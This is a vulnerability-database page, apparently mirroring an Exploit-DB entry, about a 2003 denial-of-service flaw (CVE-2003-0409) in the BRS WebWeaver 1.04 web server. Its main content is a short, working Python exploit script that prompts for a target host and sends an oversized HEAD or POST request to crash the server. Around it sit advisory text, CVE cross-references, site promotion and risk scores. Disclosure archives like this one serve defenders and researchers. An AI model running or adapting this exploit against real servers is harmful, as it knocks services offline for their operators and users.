Lucene search
+L

BRS Webweaver 1.0 4 - POST / HEAD Denial of Service

🗓️ 26 May 2003 00:00:00Reported by euronymousType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

WebWeaver 1.0 can be attacked via long POST or HEAD requests causing denial of service.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-0409
11 Jun 200304:00
cve
cvelist
Cvelist
CVE-2003-0409
11 Jun 200304:00
cvelist
euvd
EUVD
EUVD-2003-0403
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-0409
30 Jun 200304:00
nvd
source: https://www.securityfocus.com/bid/7695/info

When WebWeaver receives unusually long POST or HEAD requests, a denial of service condition may result. Restarting WebWeaver will allow normal operation to resume.

This vulnerability was reported for WebWeaver 1.04. Earlier versions may also be vulnerable.

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.07968
39